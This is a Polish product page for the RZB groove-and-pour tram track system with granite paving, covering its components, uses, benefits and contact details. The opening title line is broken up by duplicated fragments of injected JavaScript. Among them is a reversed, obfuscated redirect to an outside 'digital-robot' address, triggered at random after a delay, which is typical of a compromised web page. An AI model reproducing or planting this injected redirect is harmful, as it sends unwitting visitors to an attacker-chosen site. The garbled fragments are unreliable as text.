System rowkowo – zalewowy RZB z kostką granidom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tową

RZB - System rowkowo zalewowy z kostką granitową

Informacja ogólna o systemie

System rowkowo-zalewowy w wersji RZB jest nowoczesną nawierzchnią bezpodsypkową przeznaczoną do
torowisk tramwajowych wspólnych z jezdnią czyli tzw. nawierzchnią torowo- drogową. Konstrukcja ta stanowi
połączenie dwóch wiodących rozwiązań:

 • prefabrykowanych, betonowych płyt tramwajowych
 • sprężystego, ciągłego mocowania szyny tramwajowej w otulinie żywicznej

System składa się z czterech elementów:

 • prefabrykowanych płyt tramwajowych:
  - torowych – służących do zamocowania w nich szyn
  - międzytorowych – służących do wypełniania przestrzeni międzytorzy
 • szyn tramwajowych typu 60R2
 • wypełniających bloczków szynowych
 • otuliny żywicznej mocującej szynę oraz tłumiącej hałas i drgania

Przeznaczenie i zakres stosowania

Nawierzchnia ta przeznaczona jest do eksploatacji w:

 • torowiskach tramwajowych wbudowanych w ulice, bez ograniczenia co do długości torowiska
 • przejazdach tramwajowych
 • przejściach dla pieszych przez torowisko tramwajowe
 • torowiskach tramwajowych na obiektach mostowych

Konstrukcja nawierzchni wraz z odpowiednią podbudową pozwala na stworzenie torowisk tramwajowych, które mogą pracować obciążone ruchem w zakresie od KR1 do KR7 (kategorie ruchu drogowego wg Katalogu sztywnych nawierzchni drogowych, GDDKiA).

System RZB dopuszczony jest do stosowania bez ograniczeń na drogach publicznych i wewnętrznych oraz na obiektach inżynierskich.

Nie ma również ograniczeń w kontekście geometrii torowiska – z uwagi na szeroki typoszereg długości i szerokości płyt tramwajowych , system stosuje się w liniach jednotorowych jak i wielotorowych, zarówno na odcinkach prostych jak i w łukach poziomych i pionowych o standardowych promieniach. W łukach poziomych o promieniach w zakresie 25m ≤ R ≤ 50m można zastosować, na specjalne życzenie, płyty torowe trapezowe zmniejszające średnią szerokość szczelin międzypłytowych.

Zalety i korzyści eksploatacyjne wynikające z zastosowania systemu RZB z kostką granitową

ZALETY
KORZYŚCI
1
Zmniejszenie poziomu drgań i hałasu propagowanych do otoczenia
 • Ochrona ludzi przed szkodliwością hałasu i dyskomfortem odczuwania drgań
 • Ochrona budynków przed destruktywnym działaniem drgań
2
Możliwość dopasowania do architektury, zwłaszcza zabytkowej
 • Zwiększenie spójności architektonicznej między nawierzchnią drogową w torowisku a otoczeniem
3
Możliwość indywidualnego doboru kostki
 • Kostka brukowa z pożądanej skały, o oczekiwanym kształcie i kolorze
4
Kostka trwale zamocowana do płyty na etapie prefabrykacji również w strefie przyszynowej
 • Połączenie skutkujące wieloletnią eksploatacją i brakiem przemieszczeń oraz wypadania kostki w obszarze szyn
5
Możliwość niezwłocznego obciążenia torowiska tramwajowego ruchem pojazdów
 • Krótszy okres niedogodności wynikających z zastępczej organizacji ruchu i zastępczej komunikacji dla pasażerów i okolicznych mieszkańców
 • Niższe koszty zastępczej organizacji ruchu
 • Niższe koszty zastępczej komunikacji zbiorowej
6
Zmniejszenie falistego zużycia szyn w trakcie eksploatacji
 • Dłuższy okres eksploatacji szyn
 • Wyższy komfort jazdy
 • Niższe koszty szlifowania szyn
 • Ochrona ludzi przed dyskomfortem odczuwania drgań
 • Ochrona budynków przed destruktywnym działaniem drgań
7
Brak „mostków” wibracyjnych
 • Ochrona ludzi przed dyskomfortem drgań
 • Ochrona budynków przed destruktywnym działaniem drgań
8
Prosta i szybka technologia budowy nawierzchni torowiska tramwajowego
 • Krótszy okres niedogodności wynikających z zastępczej organizacji ruchu i zastępczej komunikacji dla pasażerów i okolicznych mieszkańców
 • Niższe koszty zastępczej organizacji ruchu
 • Niższe koszty zastępczej komunikacji zbiorowej
9
Ograniczenie upływu prądów powrotnych
 • Ograniczenie korozji nawierzchni torowo-drogowej
 • Ograniczenie korozji infrastruktury stalowej (np. rur wodociągowych) położonej pod torowiskiem
10
Niewielka ilość koniecznych prac utrzymaniowych (kontrola i ew. uzupełnianie wypełnienia szczelin międzypłytowych, czyszczenie odpływów w płytach specjalnych)
 • Niskie koszty utrzymania,
 • Niewielka ilość utrudnień spowodowanych pracami utrzymaniowymi

Certyfikaty

Nasza oferta

W naszej ofercie dla systemu rowkowo-zalewowego RZB znajdziecie Państwo nw. składniki:

 • Prefabrykowane płyty tramwajowe – torowe VRZB i międzytorowe VRm
 • Bloczki szynowe betonowe, wypełniające komory łubkowe szyn
 • Zestaw żywic Premiks do wykonania otuliny żywicznej mocującej szyny oraz wypełnienia szczelin międzypłytowych.

W razie dalszych pytań zapraszamy uprzejmie do kontaktu telefonicznego +48 12 282 67 50 lub mailowego biuro@prefa.pl.